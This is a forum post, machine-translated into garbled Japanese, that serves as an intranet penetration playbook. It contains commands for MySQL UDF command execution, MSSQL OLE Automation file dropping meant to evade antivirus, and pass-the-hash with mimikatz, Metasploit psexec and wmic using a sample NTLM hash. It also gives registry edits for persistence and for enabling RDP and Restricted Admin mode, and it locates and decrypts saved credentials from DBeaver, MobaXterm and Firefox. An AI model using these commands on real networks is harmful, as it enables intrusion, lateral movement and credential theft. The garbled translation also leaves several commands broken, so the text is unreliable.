タイトル：フローアカウントのイントラネット浸透

https://hacker.bz/t/entry/15260-%E3%82%BF%E3%82%A4%E3%83%88%E3%83%AB%EF%BC%9A%E3%83%95%E3%83%AD%E3%83%BC%E3%82%A2%E3%82%AB%E3%82%A6%E3%83%B3%E3%83%88%E3%81%AE%E3%82%A4%E3%83%B3%E3%83%88%E3%83%A9%E3%83%8D%E3%83%83%E3%83%88%E6%B5%B8%E9%80%8F/

Followers

0x00環境

LinuxホストWWW許可ホストは外部ネットワークから出ることができませんフォワードプロキシはセグメントBを使用できませんイントラネット

0x01情報を収集

f-scrack.py redis、esなどを取得します。

PS: Scrack.pyのMSSQLモジュールブラストは不正確です。自分で簡単なものを書くことができます

python scrack.py -h 10.111.1.1-10.111.2.254 -P 3306,5432 -M 200 -T 6

1.redis

多くのキーがあるときはキーを使用しない *

基本情報:マスター、数量、バージョン番号を表示します

スキャンを使用してkeys:スキャン0マッチ *カウント100を表示

タイプ:タイプキーを表示します

ハッシュタイプ: HGETALLキー

2.mysql

Windowsでは、まずプラグインディレクトリ:に書き込むことができるかどうかをテストできます

@@Plugin_dirを選択します。

outfile plugin_dirにhelloを選択してください。次に、MSFに付属のUDFを使用し、最初に16進数に変換してから、プラグインディレクトリ:にエクスポートします

テストを使用します。

@a=concat（ ''、0xhex_of_exe）;

テーブルゴーストを作成します（data longblob）;

ゴースト値に挿入（ ''）;

Ghost Set data=@a;

GhostからDumpfile Dirにデータを選択します。

CREATE FUNCTION SYS_EVAL RETURNS STRING SONAME 'SYS_EVAL.DLL';

ドロップ関数SYS_EVAL; //使用後に削除し、良い習慣を開発し、最初にSYS_EVALを選択します。 sys_execを使用しないようにしてください（クラッシュします）

3.mssql

MSSQLブラストは、動きが比較的大きくなるため、可能な限り背面に配置する必要があります。

MSSQLブラストが成功した後、CLRを使用してアクセス許可を取得することをお勧めします。 `xp_cmdshell`を直接使用すると死に、360はそれを傍受します。

MSSQLのユーザーパスワード、Certutil、およびその他のツールが傍受または警戒されることが知られています。 MSSQLが提供するツールを使用して、ハードディスクに書き込みます。

ここで、ストアドプロシージャ:を開きます

SP_CONFIGURE 'Advanced Optionsを表示'、1;

行く

再構成;

行く

SP_CONFIGURE 'OLE Automation Procedures'、1;

行く

再構成;

mssqlは大きなファイルを書き込みます

たとえば、exeおよびその他のものが最初にhexに変換され、次に:ファイルに書き込まれます

xxd -plain /tmp/test.exe | tr -d '\ n' /tmp/dll.hex

@hexstring varchar（max）を宣言します。

@hexstring='変換後のhexを設定します';

@file varbinary（max）を宣言します。

@file=（select cast（ '' as xml）.value（ 'xs:hexbinary（sql:variable（' @hexstring '）、sql:column（' t.pos '）））'、 '' varbinary（max） '）

from（select searce substring（@hexstring、1、2）の場合、 '0x' 'then 3 else 0 end）as t（pos））;

@fileを選択します;

@init intを宣言;

@filepath nvarchar（4000）=n'c: \ 22.exe ';

exec sp_oacreate 'adodb.stream'、@init output; - 作成されたインスタンス

exec sp_oasetproperty @init、 'type'、1;

exec sp_oamethod @init、 'open'; - メソッドを呼び出します

exec sp_oamethod @init、 'write'、null、@file; - メソッドを呼び出します

exec sp_oamethod @init、 'savetofile'、null、 @filepath、2; - メソッドを呼び出します

exec sp_oamethod @init、 'close'; - メソッドを呼び出します

exec sp_oadestroy @init; - リソース

4.MSSQLバックアップ

バックアップデータベースDBを閉じました

Disk='C: \ Windows \ temp \ db.bak'圧縮、init、stats=5;ボリューム圧縮rar.exe a -m0 -v100m c: \ windows \ temp \ db.split c: \ windows \ tasks \ db.bak

c: \\ windows \ temp \\ db.split.rar /var /tmp /

6.pth

wmiwmic /node:192.168.158 /user3:pt007 /password:ADMIN123プロセスコールの作成コールの作成'CMD.EXE /C ipconfigd: \ result.txt 'wmiexec.vbs:を使用することをお勧めします

https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs

cscript C: \ windows \ tasks \ aliwmi.vbs/cmd ip 'c: \ windows \ system32 \ calc.exe'msfuse exploit/windows/smb/psexec

オプションを表示します

RHOST 192.168.81.129を設定します

SMBPASS 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFを設定します

SMBUSER管理者を設定します

オプションを表示します

runmimikatz || Cobalt strikemimikatz.exe特権:Debug 'sekurlsa:pth /domain: /user3360administrator /ntlm:2d20d252a479f485cdf5e171d93985bf /run:cmd.exe '//pass hashpsexecpsecec /accepteula //

sc delete psexesvc

PSEXEC \\ 192.168.1.185 -U PT007 -P Admin123 CMD.Exe

psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig'リモートコマンド実行scnet seve \\ 192.168.17.138 \ c $ 'admin123' /user:pt007

正味使用

dir \\ 192.168.17.138 \ c $

Test.exe \\ 192.168.17.138 \ c $をコピーします

sc \\ 192.168.17.138 Create test binpath='c: \ test.exe'

sc \\ 192.168.17.138テスト開始

Sc \\ 192.168.17.138 Del Test

Windows :https://xz.aliyun.com/t/5957でCMDをリモートで実行する9つの方法

0x03アクセスは拒否されます

RID 500ではないコンピューターでは、使用されるトークンは、WMI、PSEXEC、またはその他の方法を使用するかどうかにかかわらず、中程度のトークンです。 wmiexecを使用する場合、アクセスが拒否されることが修正されます

ハッシュをrawったとき、レジストリを変更することができ、すべてのローカル管理者グループメンバーが持続の手段としてリモートで接続できるようにします。

Reg add hklm \ software \ microsoft \ windows \ currentversion \ policies \ system /v localaccounttokenfilterpolicy /t reg_dword /d 1 /f ### rdp's pth

クロールハッシュをクラックできない場合、ハッシュを使用してRDPにリモートでログインすると、「制限された管理モード」を有効にするためにログインしているシステムが必要になります。 Windows 7およびWinserver 2008には、2871997と2973351プディングの設置が必要です。

1。 RDPを開始

reg 'hklm \ system \ currentControlset \ control \ターミナルサーバー' /v fdenytsconnections /t reg_dword /d 00000000 /f

reg add 'hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ Winstations \ rdp-tcp' /v portnumber /t reg_dword /d0x00000d3d /f＃ポート3389を聞いてください

3389をオンにします

wmic /namespace: \\ root \ cimv2 \ emerinalservices path win32_terminalservicesetting where（__class！=''）call setallowtsconnections 1

2。制限付き管理モードをオンにします

reg reg add 'hklm \ system \ currentControlset \ control \ lsa' /v disable-sustricedadmin /t reg_dword /d 00000000 /f 010-10 #### dbeaver

dbeaver6構成ファイル（ストレージの場所と復号化方法は、バージョンによって異なります）:

#PassWord暗号化されたストレージ場所:

c: \ users \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ curdentiences-config.json

#URLおよびユーザー名:

c: \ uses \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ data-sources.json Decryption script:https://gist.github.com/felipou/50b60309f9f9b70b1e28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd8e

資格情報をダウンロードした後、pythonを使用して:python decrypt.py credentivelys-config.jsonを復号化し、次に、復号化されたIDに基づいて、Data-Sources.jsonの対応するIPとユーザー名を検索します。

パスワードの古いバージョンは、C: \ users \ users \ .dbeaver4 \ general \ .dbeaver-data-source.xmlに保存されています。http://DBEAVER-PASSWORD-DECRYPTER.S3-WEBSITE-US-WEST-2.AMAZONAWS.COM/を使用して、オンライン復号化を直接使用できます。

3。ファイアウォールルールを追加

対応するIP情報とプライベートキーアドレスを備えた.iniファイルがあります

ストレージの古いバージョン: C: \ users％username％\ appdata \ roaming \ mobaxterm

2020バージョン: c: \ users％username％\ documents \ mobaxterm

0x04ダンプパスワード

Windowsの下の構成ファイルはこの場所にあります:

％appdata％\ code \ user \ settings.jsonは、構成ファイルに基づいてメモやSSHなどのストレージ場所を見つけることができます

0x05 MOBAXTEM

マスターサンハオはそれをとても言った、私はfirepwd.py:を使用することを選んだ

Firefox構成ファイルディレクトリ:

％AppData％\ Mozilla \ firefox \ profiles \

Sign In